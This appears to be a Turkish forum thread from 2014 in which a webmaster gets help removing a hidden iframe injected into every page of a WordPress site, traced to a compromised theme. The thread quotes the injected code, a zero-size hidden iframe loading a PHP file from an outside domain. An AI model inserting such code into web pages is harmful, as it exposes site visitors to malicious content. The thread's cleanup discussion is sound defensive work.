WordPress Iframe Virüs Konusu

'Soru Cevap' forumunda oalatumur tarafından 25 Aralık 2014 tarihinde açılan konu

  1. oalatumur

    oalatumur Kayıtlı Kullanıcı

    selam arkadaşlar,

    Wordpress sitenizde sizden habersiz oluşan iframe hidden link yönlenme konusunda tecrübesi olan varmı.iframe virüsü diyorlar buna ve önemli bir siteme bulaştı.

    tecrübesi olan varsa nasıl sileceğimi anlatabilir mi ?
     
  2. Batur

    Batur Kayıtlı Kullanıcı

    Selam. Hangi dosyaya bulaştı?
     
  3. oalatumur

    oalatumur Kayıtlı Kullanıcı

    batur hocam vakıt ayırdıgın ıcın tesekkurler, sıtedekı her sayfada view source içerisinde yer alıyor.ilgili satır aşağıdaki gibidir.Hangi dosyadan bulaştı nerede duruyor çözemedim hala

    PHP:
    </iframe><iframe src="http://phoenix-credit.com/wp-content/cache.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
     
  4. Batur

    Batur Kayıtlı Kullanıcı

    Site dosyalarında arama yaparak, ilgili iframe kodlarını bulmaya çalışın. Ayrıca dosya cmod değerlerini gözden geçirin. wp-config.php dosyasının cmod ayarını 600 yapın.
     
  5. oalatumur

    oalatumur Kayıtlı Kullanıcı

    valla gozden geçırmedıgım alan kalmadı, hostıngemı bulaştı nedır anlamadım, yenı sıteye kurmaya doğru gidiyorum yavaş yavaş ama hayırlısı
     
  6. Batur

    Batur Kayıtlı Kullanıcı

    Dosyaları bilgisayarınıza indirin ve Notepad++

    gibi bir programla iframe ya da phoenix aramaları yapın. Bulunamazsa, base64 şeklinde arama yapın. Belki şifrelenmiştir kodlar.
     
  7. oalatumur

    oalatumur Kayıtlı Kullanıcı

    şifrelenmişlere bakmadım ama sorunu buldum, temadan kaynaklıydı, tamayı dısable edınce sıte kendıne geldı, temanın yenı versıyonunu kontrol edıp, eskısını sılerek yenıden yukleyecegım.

    w****z de kullanmıyorum kı anlamadım nereden musallat oldu.hosting desen paylaşımlı degış dırekt kendıme aıt VDS ve tek domain kullanıyor.

    neyse sımdılık atlattım gıbı sorunu, problemın sebebını bulmak = çözmek :)

    sagol hocam ılgın ıcın
     
  8. Batur

    Batur Kayıtlı Kullanıcı

    Rica ederim. Kolay gelsin.
     
  9. Seo Kriter

    Seo Kriter Vip Üye

    Tema w***z olmasa da bazı temalarda bu sorunu bende yaşadım zamanında ve genelde temayı ftp den indirip notepad veya başka bir programla açınca görünmeyebiliyor bazen. Ben cpanel den file managerden görebiliyordum ve oradan düzenliyordum dosyayı. config.php izinlerini 0444 yapsan da tema içinde sürekli kendisini çalıştıran bir dosya var ve yeniden geliyor. Bazende DNS ayarlarında A kaydı oluşturarak site her yere senin mail adresinden binlerce mail gönderiyor. Sıunucunda PHP mail fonksiyonu kapalıysa ve SMTP de gönderim limiti varsa sorun olmuyor ama yoksa sıkıntı.

    Ben o temayı kullanmaktan vazgeçerek, temiz bir wordpress kurulumu yaptım eski siteden verileri dışarı aktardım ve yeni siteye yükledim. O şekilde kurtulmuştum. İnşallah daha az sıkınıtıyla kurtulursun hocam.

    Bu arada ftp şifresini mutlaka değiştir hocam.
     
  10. oalatumur

    oalatumur Kayıtlı Kullanıcı

    mail gönderme olayıda cıdden sıkıntı ancak saatlık lımıt var, saatte 10 adet :D
    temanın yenı versıyonunu kurunca duzeltı, hemen sıfrelerıde degıştırdım zaten

    tesekkur ederım cevabın ıcın ustad
     
  11. Süha Mete

    Süha Mete Kayıtlı Kullanıcı

    Var olan temadan değil tema dizininde bulunan başka temalardan da bulaşabiliyor hocam. Kullandığınız tema hariç temaları silin. Zararlı kodları bulup silmeye çalışın ftp şifrelerini değiştirin.

    Bilgisayarda da virüs taraması yapın tekrar şifr değiştirin vb işlemler işte :)
     
  12. oalatumur

    oalatumur Kayıtlı Kullanıcı

    hocam zaten o sekılde kullanıyorum.sıtelerde pasıf durumda olan hıb bır eklentı ya da temadı bekletmem, dırekt sılerım.
     
  13. Süha Mete

    Süha Mete Kayıtlı Kullanıcı

    wp.org dışında eklentiniz varsa onları silin. Zararlı kodu bulup silip ve dediklerimi yptıktan snra hala geri geliyorsa virüs format da gerekebilir çünkü filezilladan ulaşıyor olabilirler sitene.
     
  14. oalatumur

    oalatumur Kayıtlı Kullanıcı

    vmware de yenı bır pc kurarak dosya transferlerını yaptım.sorun temadaydı, temayı sılım yenı dosyaları kopyalayınca miss gibi oldu
     
  15. Süha Mete

    Süha Mete Kayıtlı Kullanıcı

  16. MToprak

    MToprak Kayıtlı Kullanıcı

    Uzun zaman önce bu virüsü temizlemek için çok uğraşmıştım.

    Ben kodun hangi dosyalara bulaştığını anlamak için Advanced Find And Replace programını kullanmıştım. Dosyalarda toplu arama yapmaya yarar bu program.

    Virüs bilgisayara bulaşıyordu diye hatırlıyorum. Ftp şifresini değiştirsek dahi ftpye bağlanınca kodlar tekrar yükleniyordu. Tekrar bu sorunla karşılaşırsanız bilgisayardaki virüsü temizlemek(mümkünse format), ftp şifresini değiştirmek kesin çözüm olur.
     
  17. oalatumur

    oalatumur Kayıtlı Kullanıcı

    hocam programın adını aldım, eger dedıgınız ıslerı duzgun yapıyorsa guzel program.en yakın zamanda test edicem.
    teşekkür ederim
     

Bu Sayfayı Paylaş